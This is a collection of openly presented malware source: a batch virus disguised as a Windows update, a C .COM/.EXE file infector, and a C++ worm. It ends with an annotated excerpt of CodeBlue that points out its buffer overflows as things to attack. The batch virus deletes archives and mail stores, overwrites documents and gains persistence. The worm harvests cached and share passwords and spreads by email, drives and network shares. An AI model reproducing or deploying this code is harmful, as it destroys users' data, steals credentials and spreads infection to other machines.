A batch file virus code

@ECHO OFF
CLS
IF EXIST c:\winupdt.bat GOTO CODE
GOTO SETUP
:SETUP
@ECHO OFF
ECHO Ein batch Virus - getarnt als Windows-Update
ECHO.
copy %0 c:\winupdt.bat >> NUL
ECHO Bitte haben sie ein wenig Geduld ... ausführen des Systemscans ...
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO fertig


ECHO.
ECHO Die benötigten Dateien werden installiert!
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO Installation abgeschlossen
ECHO.
ECHO Bitte registrieren sie sich nun bei schell-industry, 

um über neue updates informiert zu werden.
PAUSE
ECHO Download gestartet...
START "C:\Program Files\Internet Explorer\Iexplore.exe" 

http://www.schell-industry.de.vu/
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del 

"C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}

\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" 

del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Damit die Einstellungen erfolgreich übernommen werden können, 

wird jetzt ein Neustart durchgeführt.
ECHO Bleiben sie uns weiterhin treu, ihr SCHELL-industry Sicherheitsteam.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec
CLS
GOTO END

:CODE
CLS
@ECHO OFF
prompt $P$SWindows2000
IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC
type %0 >> c:\autoexec.bat
:ABC
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" 

http://www.schell-industry.de.vu/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" 

del "C:\WINDOWS\Application Data\Identities\

{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" 

del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
GOTO :END
CLS
:END
CLS

A generic or .com and .exe infector in C

 /* C-Virus:  A generic .COM and .EXE infector

   Written by Nowhere Man

   Project started and completed on 6-24-91

   Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/

[to protect the code from script kiddies.. header files are not given]

#pragma inline                              // Compile to .ASM

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

 #define DEBUG
#define ONE_KAY   1024                      // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300)               // 6k+ size minimum
#define SIGNATURE "NMAN"                    // Sign of infection

int main(void)
{
    /* The main program */

    spread(_argv[0], victim());             // Perform infection
    small_print("Out of memory\r\n");       // Print phony error
    return(1);                         // Fake failure...
}

void hostile_activity(void)
{
    /* Put whatever you feel like doing here...I chose to
       make this part harmless, but if you're feeling
       nasty, go ahead and have some fun... */

    small_print("\a\a\aAll files infected.  Mission complete.\r\n");
    exit(2);
}

int infected(char *fname)
{
    /* This function determines if fname is infected */

    FILE *fp;                     // File handle
    char sig[5];                       // Virus signature

    fp = fopen(fname, "rb");
    fseek(fp, 28L, SEEK_SET);
    fread(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
    printf("Signature for %s:  %s\n", fname, sig);
#endif
    fclose(fp);
    return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}

void small_print(char *string)
{
    /* This function is a small, quick print routine */

    asm {
         push si
         mov  si,string
         mov  ah,0xE
    }

print:   asm {
         lodsb
         or   al,al
         je   finish
         int  0x10
         jmp  short print
    }
finish: asm   pop  si
}

void spread(char *old_name, char *new_name)
{
    /* This function infects new_name with old_name */


    /* Variable declarations */

    FILE *old, *new;                   // File handles
    struct ftime file_time;                         // Old file date,
time
    int attrib;                        // Old attributes
    long old_size, virus_size;              // Sizes of files
    char *virus_code = NULL;           // Pointer to virus
    int old_handle, new_handle;             // Handles for files


    /* Perform the infection */

#ifdef DEBUG
    printf("Infecting %s with %s...\n", new_name, old_name);
#endif
    old = fopen(old_name, "rb");            // Open virus
    new = fopen(new_name, "rb");            // Open victim
    old_handle = fileno(old);               // Get file handles
    new_handle = fileno(new);
    old_size = filelength(new_handle);      // Get old file size
    virus_size = filelength(old_handle);         // Get virus size
    attrib = _chmod(new_name, 0);           // Get old attributes
    getftime(new_handle, &file_time);       // Get old file time
    fclose(new);                       // Close the virusee
    _chmod(new_name, 1, 0);                 // Clear any read-only
    unlink(new_name);                  // Erase old file
    new = fopen(new_name, "wb");            // Open new virus
    new_handle = fileno(new);
    virus_code = malloc(virus_size);        // Allocate space
    fread(virus_code, virus_size, 1, old);       // Read virus from old
    fwrite(virus_code, virus_size, 1, new);         // Copy virus to new
    _chmod(new_name, 1, attrib);            // Replace attributes
    chsize(new_handle, old_size);           // Replace old size
    setftime(new_handle, &file_time);       // Replace old time


    /* Clean up */

    fcloseall();                       // Close files
    free(virus_code);                  // Free memory
}

char *victim(void)
{
    /* This function returns the virus's next victim */


    /* Variable declarations */

    char *types[] = {"*.EXE", "*.COM"};          // Potential victims
    static struct ffblk ffblk;              // DOS file block
    int done;                     // Indicates finish
    int index;                         // Used for loop


    /* Find our victim */

    if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
         return(_argv[1]);

    for (index = 0; index < sizeof(types); index++) {
         done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
         while (!done) {
#ifdef DEBUG
              printf("Scanning %s...\n", ffblk.ff_name);
#endif
              /* If you want to check for specific days of the week,
                 months, etc., here is the place to insert the
                 code (don't forget to "#include "!) */

              if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
                   return(ffblk.ff_name);
              done = findnext(&ffblk);
         }
    }


    /* If there are no files left to infect, have a little fun... */

    hostile_activity();
    return(0);                         // Prevents warning
}

A worm in cpp

// ---[ w0rm.cpp ]-----------------------------[ http://harmony.haxors.com ]--//
//
// An exploration into remote network propogation using multiple techniques.
// The w0rm will spread via e-mail (MAPI) all local drives and any writable
// network shares. It collects passwords on the local system to be used in
// cracking any password protected shares on the network. It will write an
// Autorun.inf file in the root of any drives it can so when you open that
// drive, e.g. double click it the w0rm will execute and go resident :).
// This code is obviously buggy and not intended to be actually used in the
// 'real' world. To determine if the payload should be deployed the w0rm
// sits on the network and plays a 'game' with other w0rms on that network
// segment via broadcast UDP messages. see relevant source for a proper
// idea of the 'game', its just a perverse example of too much time on ones
// hands :). this is version 1.00 so the are bugs, incompatabilities with
// various flavors of windows and other anomolies - dose! but if you want
// something better write it yourself ;) (and send me a copy)
//
//               "this is the end, beautiful friend" - the doors
//
// ---[ harmony :: temple of the screaming interrupt ]--[ nomelody@gmx.net ]--//

//--header-files--------------------------------------------------------------//
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <io.h>
#include <dos.h>

#include <conio.h>
//--defines-------------------------------------------------------------------//
#define MAX_LENGTH          128
#define MAX_RECIEVERS       50
#define MUTEX_NAME          "w0rm"
#define EARTH_WORM_JIM      "Readme.exe"

#define WORMGAME_PORT       12345
#define WORMGAME_MAX_WINS   10
#define WORMGAME_PKT_PLAY   0xFF
#define WORMGAME_PKT_WIN    0x80
//--globals-------------------------------------------------------------------//
char *ptrEgo, *buf;
char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];
int index = 0;

typedef struct tagPASSWORD_CACHE_ENTRY {
    WORD cbEntry;
    WORD cbResource;
    WORD cbPassword;
    BYTE iEntry;
    BYTE nType;
    BYTE abResource[1];
} PASSWORD_CACHE_ENTRY;

typedef struct WormGamePkt {
    BYTE pktType;
    int pktNum;
} AWORMGAMEPACKET;
//--function-declarations-----------------------------------------------------//
DWORD WINAPI WormGameThread( LPVOID );
DWORD WINAPI WormMainThread( LPVOID );

BOOL runningNT();
void propogateMAPI( void );
int initMAPI( void );
int validAddress( char * addr );
int sendMessage( int recipNum, LHANDLE lhSession );
int getSharePasswords( void );
int getCachedPasswords( void );
int addPassword( char * pwd );
void propogateDrive( void );
void attackDrive( char * drive, int type );
void propogateNet( LPNETRESOURCE lpnr );
int crackNetShare( char * share );
void releasePayload();

extern "C" int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );
//--entry-point---------------------------------------------------------------//
// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
int main( int argc, char **argv )
{
        HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;
        DWORD WormGameThreadId, WormMainThreadId;

        // display explorer window if we need to, due to autorun.inf file :)
        // test for any command line...

        /* only allow one instance of worm to run on system at one time */
        hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);
            if(  GetLastError() == ERROR_ALREADY_EXISTS )
            {
                ExitProcess( 0 );
            }

        ptrEgo = argv[0];

        /* try to 'hide' the process */
            if( runningNT() == TRUE )
            {
                // hide process in winNT
                printf("WORM running on WinNT\n");
            } else {
                printf("WORM running on Win9x\n");
                LoadLibrary( "KERNAL32.DLL" );
                RegisterServiceProcess( NULL, 1);
            }

        /* go resident and give worm RAW power */
        hEgo = GetCurrentProcess();
        SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);

        // create suspended WormMainThread...
        hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);
            if( hWormMainThread != NULL )
            {
                // set thread to time critical... 'i wana take you higher' - sly and the family stone
                //SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);
                // resume thread execution...
                ResumeThread( hWormMainThread );
            }
 /*
        // create suspended WormGameThread...
        hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);
            if( hWormGameThread != NULL )
            {
                // resume thread execution...
                ResumeThread( hWormGameThread );
            }                                         
                                                       */
        /* wait for hWormGameThread() to terminate */
     //   WaitForSingleObject( hWormGameThread, INFINITE);
        WaitForSingleObject( hWormMainThread, INFINITE);

        printf("MAIN_DEBUG: worm threads ended, im outa here: press a key...\n");
        getch();

        /* release our mutex, next local worm wont get blocked */
            if( hMutex != NULL )
            {
                ReleaseMutex( hMutex );
            }
        return 0;
}

//----------------------------------------------------------------------------//
DWORD WINAPI WormMainThread( LPVOID )
{
        DWORD dwSize;
        char buff[64];
        printf("WormMainThread: started...\n");
        /* spread worm via MAPI */
        propogateMAPI();
        /* get any passwords we can for use later on */
        getSharePasswords();
        getCachedPasswords();
        dwSize = 64;
        WNetGetUser( NULL, buff, &dwSize );
        addPassword( buff );
        printf("DEBUG: total pwds got = %d\n", index);
        /* spread worm via any/all localy maped drives */
        propogateDrive();
        /* spread worm via any/all LAN network shares */
        propogateNet( NULL );
        /* finished our little game :) */
        ExitThread( 0 );
        return 0;
}
//----------------------------------------------------------------------------//
DWORD WINAPI WormGameThread( LPVOID )
{

        WSADATA w;
        SOCKET s_recv, s_send;
        sockaddr_in saddr, saddr_in, saddr_out;
        int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;
        AWORMGAMEPACKET gamePkt;
        fd_set fd_read;
        struct timeval timeout = { 5, 0 };

            if( WSAStartup( MAKEWORD(1,0), &w) != 0 )
            {
                printf("WormThread: WSAStartup failed\n");
                goto endThread;
            }

        s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
            if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )
            {
                printf("WormThread: invalid socket\n");
                goto endThread;
            }

        memset( &saddr_in, 0x00, sizeof( struct sockaddr));

        memset( &saddr, 0x00, sizeof( struct sockaddr));
        saddr.sin_family = AF_INET;
        saddr.sin_port = htons( WORMGAME_PORT );
        saddr.sin_addr.s_addr = INADDR_ANY;

        memset( &saddr_out, 0x00, sizeof( struct sockaddr) );
        saddr_out.sin_family = AF_INET;
        saddr_out.sin_port = htons( WORMGAME_PORT );
        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

        optval = 1;
            if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )
            {
                printf("WormThread: setsocketopt failed\n");
                goto endThread;
            }

            if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )
            {
                printf("WormThread: bind failed\n");
                goto endThread;
            }

        FD_ZERO( &fd_read );
        FD_SET( s_recv, &fd_read );
        randomize();
loop:
        while( 1 )
        {
               if( totalwins >= WORMGAME_MAX_WINS )
                {
                    releasePayload();
                    totalwins = 0;
                }
            // pick a magic number...
            magicWorm = ( ( rand() % 100 ) + 1 );
            printf("WormThread: picked a magic num: %d\n", magicWorm);
            // wait a length of time...
            Sleep( 500 );
            // send my magic number...
            gamePkt.pktType = WORMGAME_PKT_PLAY;
            gamePkt.pktNum = magicWorm;
                if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )
                {
                    printf("WormThread: sendto failed\n");
                    break;
                }

            // handel responces...
                while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )
                {
                    if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )
                    {
                        printf("WormThread: recvfrom failed\n");
                        break;
                    } else {
                        switch( gamePkt.pktType )
                        {
                            case WORMGAME_PKT_PLAY: // recieved a magic number...
                                // ignore responce from local machine...
                                printf("WormThread: recieved a magic num: %d\n", gamePkt.pktNum);
                                // process other responces
                                    if( gamePkt.pktNum == magicWorm )
                                    {
                                        // notify any winners
                                        gamePkt.pktType = WORMGAME_PKT_WIN;
                                        saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;
                                        sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);
                                        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
                                    }
                                break;
                            case WORMGAME_PKT_WIN: // im a winner :)
                                printf("WormThread: IM A WINNER!!!\n");
                                totalwins++;
                                goto loop;
                            default:   // its all gone bugfuck!
                                printf("WormThread: its all gone bugfuck!\n");
                                break;
                        }
                    }
                } // while(select...
        }
endThread:
        closesocket( s_recv );
        closesocket( s_send );
        ExitThread( 0 );
        return 0;
}
//----------------------------------------------------------------------------//
BOOL runningNT()
{
        OSVERSIONINFO osvi;
        BOOL retval = FALSE;

        osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
        GetVersionEx(&osvi);
            switch( osvi.dwPlatformId )
            {
                case VER_PLATFORM_WIN32_NT:
                    retval = TRUE;
                    break;
                case VER_PLATFORM_WIN32_WINDOWS:
                    retval = FALSE;
                    break;
                default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE
                    retval = FALSE;
                    break;
            }
        return retval;
}
//----------------------------------------------------------------------------//
void propogateMAPI( void )
{
        LHANDLE lhSession;
        CHAR rgchMsgID[513];
        MapiMessage *lpMessage;
        int i=0;
            if( initMAPI() != 0 )
            {
                return;
            }
            if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
            {
                *rgchMsgID = NULL;
                    while( i < MAX_RECIEVERS )
                    {
                        if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
                        {
                            break;
                        }
                        if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
                        {
                    //    printf("DOING: %s\n\t%s\n",lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);
                            if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )
                            {
                                strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);
                                i++;
                            }
                            if( validAddress( lpMessage->lpRecips->lpszAddress  ) == 0 )
                            {
                                strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);
                                i++;
                            }
                        }

                    }
                MAPIFreeBuffer( lpMessage );

                // TO DO: sort addressList and remove duplicates...

                //sendMessage( i, lhSession );    // <---- !!!!!!

                MAPILogoff( lhSession, 0L, 0L, 0L);
            }
            for( int x = 0 ; x < i ; x++ )
            {
                printf("DEBUG: attacking:\t%s\n", addressList[x]);
            }
        return;
}
//----------------------------------------------------------------------------//
int initMAPI( void )
{
        HINSTANCE hi;
        LPMAPILOGON MAPILogon;
        LPMAPIFINDNEXT MAPIFindNext;
        LPMAPIREADMAIL MAPIReadMail;
        LPMAPISENDMAIL MAPISendMail;
        hi = LoadLibrary( "mapi32.dll" );
            if( hi == NULL )
            {
                return -1;
            }
        MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");
        MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");
        MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");
        MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");
            if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )
            {
                return -1;
            }
        return 0;
}
//----------------------------------------------------------------------------//
int validAddress( char * addr )
{
        if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)
        {
            return -1;
        } else if( strchr( addr , '@') == NULL )
        {
            return -1;
        } else if( strchr( addr , '.') == NULL )
        {
            return -1;
        } else {
            return 0;
        }
}
//----------------------------------------------------------------------------//
int sendMessage( int recipNum, LHANDLE lhSession )
{
        MapiRecipDesc *recips  = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );
        MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};
            for( int i=0 ; i<recipNum ; i++ )
            {
                recips[i].ulReserved   = 0;
                recips[i].ulRecipClass = MAPI_TO;
                recips[i].lpszName     = addressList[i];
                recips[i].lpszAddress  = addressList[i];
                recips[i].ulEIDSize    = 0;
                recips[i].lpEntryID    = NULL;
            }
        MapiMessage note = { 0, "The Subjext", "The Message Text", NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};
            if( MAPISendMail( lhSession, 0L, &note, 0L, 0L) != SUCCESS_SUCCESS )
            {
                return -1;
            }
        free( recips );
        return 0;
}
//----------------------------------------------------------------------------//
int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
        memmove(buf, x->abResource+x->cbResource, x->cbPassword);
        buf[x->cbPassword] = 0;
        addPassword( buf );
        return 0;
}
//----------------------------------------------------------------------------//
int getCachedPasswords( void )
{
        buf = new char[1024];
        HINSTANCE hi = LoadLibrary("mpr.dll");
            if( hi == NULL )
            {
                return -1;
            }
        WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");
            if( enp == NULL )
            {
                return -1;
            }
        enp( 0, 0, 0xff, pce, 0);
        FreeLibrary( hi );
        return 0;
}
//----------------------------------------------------------------------------//
BYTE rotr( BYTE b )
{
        BYTE carry;
        carry = b & 0x01;
        carry <<= 7;
        b >>= 1;
        b |= carry;
        return b;
}
//----------------------------------------------------------------------------//
void decodePW( char * pw )
{
        BYTE hash = 0x35;
            while( pw && *pw )
            {
                *pw = *pw ^ hash;
                pw++;
                hash = rotr( hash );
            }
}
//----------------------------------------------------------------------------//
int addPassword( char * pwd )
{
            if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) )
            {
                strcpy( passwordList[ index ], pwd);
                printf("DEBUG: ADDED: %s\n", passwordList[ index ]);
                index++;
            }
        return 0;
}
//----------------------------------------------------------------------------//
int getSharePasswords( void ){
        if( runningNT() == FALSE )
        {
            HKEY key, subkey;
            DWORD i, maxKeys, len, junk;
            char keyName[256], wrightPwd[256], readPwd[256];
            RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan", 0, NULL, &key);
            RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);
                if( maxKeys != 0 )
                {
                    for( i=0; i<maxKeys; i++ )
                    {
                        RegEnumKey(key, i, keyName, 256);
                        RegOpenKeyEx(key, keyName, 0, NULL, &subkey);
                        wrightPwd[0] = readPwd[0] = 0;

                        len = 256;
                        RegQueryValueEx(subkey, "Parm1enc", NULL, &junk, (BYTE *)wrightPwd, &len);
                        wrightPwd[len] = 0;
                        decodePW(wrightPwd);
                        addPassword( wrightPwd );

                        len = 256;
                        RegQueryValueEx(subkey, "Parm2enc", NULL, &junk, (BYTE *)readPwd, &len);
                        readPwd[len] = 0;
                        decodePW(readPwd);
                        addPassword( readPwd );
                    }
                }
            RegCloseKey(subkey);
            RegCloseKey(key);
        }
        return 0;
}
//----------------------------------------------------------------------------//
void propogateDrive( void )
{
        int length;
        char buff[MAX_LENGTH], *ptr;

        ptr = buff;
        length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;

        if( length > 0 && length < MAX_LENGTH)
        {
            for( int i=0 ; i<=(length/4) ; i++ )
            {
                    switch( GetDriveType( ptr ) )
                    {
                        case DRIVE_FIXED:
                            // The drive is a local drive.
                            printf("DRIVE_FIXED: %s\n", ptr);
                            attackDrive( ptr, 1 );
                            break;
                        case DRIVE_REMOTE:
                            // The drive is a network drive.
                            printf("DRIVE_REMOTE: %s\n", ptr);
                            attackDrive( ptr, 1 );
                            break;
                        default:
                            break;
                    }
                *ptr+=1;
            }
        }
        return;
}
//----------------------------------------------------------------------------//
void attackDrive( char * drive, int type )
{
        FILE *fpAutorun;
        char buff[MAX_LENGTH];
        // copy worm to drive, Attribute = hidden
            if( type == 1 )
            {
                sprintf( buff, "%s%s", drive, EARTH_WORM_JIM);
            } else {
                sprintf( buff, "%s\\%s", drive, EARTH_WORM_JIM);
            }
        printf("DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n", drive, buff);
        /*    if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )
            {
                // create an Autorun.inf file on drive, Attribute = hidden
                sprintf( buff, "%sAutorun.inf", drive);
                fpAutorun = fopen(buff, "w");
                    if( fpAutorun != NULL )
                    {
                        fprintf( fpAutorun, "[Autorun]\nOPEN=%s\n", EARTH_WORM_JIM);
                        fclose( fpAutorun );
                        _rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);
                    }
            }   */
        return;
}
//----------------------------------------------------------------------------//
void propogateNet( LPNETRESOURCE lpnr )
{
        DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;
        HANDLE hEnum;
        LPNETRESOURCE lpnrLocal;
        dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);
            if( dwResult != NO_ERROR )
            {
                return;
            }
            do
            {
                lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);
                dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);
                    if ( dwResultEnum == NO_ERROR )
                    {
                        for( DWORD i = 0; i < cEntries; i++ )
                        {
                                if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )
                                {
                                    propogateNet( &lpnrLocal[i] );
                                } else if( RESOURCETYPE_DISK  == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )
                                {
                                    if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )
                                    {
                                        // try all found password/username combinations...
                                        printf("ERROR_INVALID_PASSWORD "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
                                            if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )
                                            {
                                                attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                                WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                            }
                                    } else {
                                        attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                        WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                        printf("ACCESS NOT DENIED "); printf("ATTACKING: %s\n",lpnrLocal[ i ].lpRemoteName );
                                    }
                                }
                        }
                    } else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {
                        break;
                    }
            } while( dwResultEnum != ERROR_NO_MORE_ITEMS );
        GlobalFree( (HGLOBAL) lpnrLocal );
        WNetCloseEnum( hEnum );
        return;
}
//----------------------------------------------------------------------------//
int crackNetShare( char * share )
{
        int retval = 0;
            for( int i=0 ; i<index ; i++ )
            {
                retval = WNetAddConnection( share , passwordList[i], NULL );
                if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD )   // <----- !!! dodgy testing, fix it
                {
                    printf("PASS CRACKED: %s : %s\n", share , passwordList[i]);
                    return 0;
                }
            }
        return -1;
}
//----------------------------------------------------------------------------//
void releasePayload()
{
        printf("\n\t!!! PAYLOAD !!!\n");
        return;
}
//----------------------------------------------------------------------------//

A

Code Blue v5.0 source

CODE BLUE

$ cd codeblue
$ ls
CHANGES COPYING Makefile README codeblue.c
$ head COPYING
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

/* uh-oh */

$ vi codeblue.c
/*
* $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01
* root Exp root $
*
******************************************************************************************
* -[ G O D B L E S S A M E R I C A ]-
*
******************************************************************************************
*
* CodeBlue v5.0 by Michael (mystic@tenebrous.com)
* This software is freely distributable under the terms of the GNU/GPL.
* Please see file 'COPYING'

/* god bless america, AND mystical mike! */

....

/* line ~273 */
/*
* siginal_init:
* sets up all the signals we'd like
* to handle specially
*/
void signal_init(void)
{
struct sigaction sa_old, sa_new;

/* signal handling */
sa_new.sa_handler = signal_handler;
sigemptyset(&sa_new.sa_mask);
sa_new.sa_flags = 0;
sigaction(SIGINT, &sa_new, &sa_old);
sigaction(SIGPIPE, &sa_new, &sa_old);
}

/* shared signal handler doing all sorts of stuff, not very good mike :( */

/* line ~289 */

/*********************************************************************
* Our close() wrapper
*/
int Close(int sd)
{
return (close(sd));
}

/* that just made me laugh */

/* line ~661 */

char logline[512]; /* logline is global */

int scan_file(FILE * fp)
{
char buffer[1024];

....

fgets(buffer, 1024, fp);

....

if (found_infected == 1) { /* if it picks up a worm entry in the */
/* log this is true */

strcpy(logline, buffer);

/* oh dear */

/* line ~827 */

char reply[512]; /* global */
char whoispath[512] = "/usr/bin/whois"; /* global */

int main(int argc, char **argv)
{

.....

if (argv[i][0] == '-')
switch (argv[i][1]) {
case 'e':{ /* return email address */
if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))
DieWithRequire(argv[i]);
strcpy(reply, argv[i + 1]);
break;
}
case 'p':{ /* path to whois binary */
if ((!argv[i + 1]) || (argv[i + 1][0] == '-'))
DieWithRequire(argv[i]);
strcpy(whoispath, argv[i + 1]);
break;
}

/* whoops! */


Now, all this is good for a laugh, but unless its suid, not much use :(

CodeBlue will scan apache/squid logfiles looking for code red and nimda log
hits. If it finds a hit, it will connect to the source ip adress of the hit
and send an email warning of infection. Unfortunately, mystical mike was too
far up on his high horse to write something decent.

The function that does this is send_email() (line ~552)

It starts off like this:

int send_email(void)
{
int sd;
char *host = malloc(sizeof(char) * 512);

/* .... silly crap using popen and stuff .... */

/* host is the infected host from the logfiles
* this will connect to the host on port 25
*/

if ((sd = smtp_connect(host)) < SUCCESS)
return -1;

/* Step 0 - Get initial server response */
get_smtp_reply(sd);

/* this is the function of interest */

/* line ~345 */
/*********************************************************************
* fetches a reply from the SMTP server
*/
int get_smtp_reply(int sd)
{
char response[1024]; /* this is the remote host's mail server buf */

....

/* props to dme!!! */

/*
* We'll loop infinately, receiving
* 1 byte at a time until we receive a carriage return
* or line-feed character, signifying the end of the output
*/
/* GEE! THAT SOUNDS LIKE A GOOD IDEA MYSTICAL MIKE#@!#@! */

....

while (TRUE) {
if (select((sd + 1), &rset, NULL, NULL, &tv) < 0) {
if (errno != EINPROGRESS) {
fprintf(stderr, "[ ERROR: select() failed: %s\n",
strerror(errno));
return -1;
}
}
if (recv(sd, (int *) &response[i], 1, RECV_FL) < 0) { /* Hello */
if (errno == EAGAIN) {
if (elapsed >= smtp_timeout) {
fprintf(stderr, "[ ERROR: operation timed out\n");
fprintf(log, "..... ERROR: operation timed out\n");
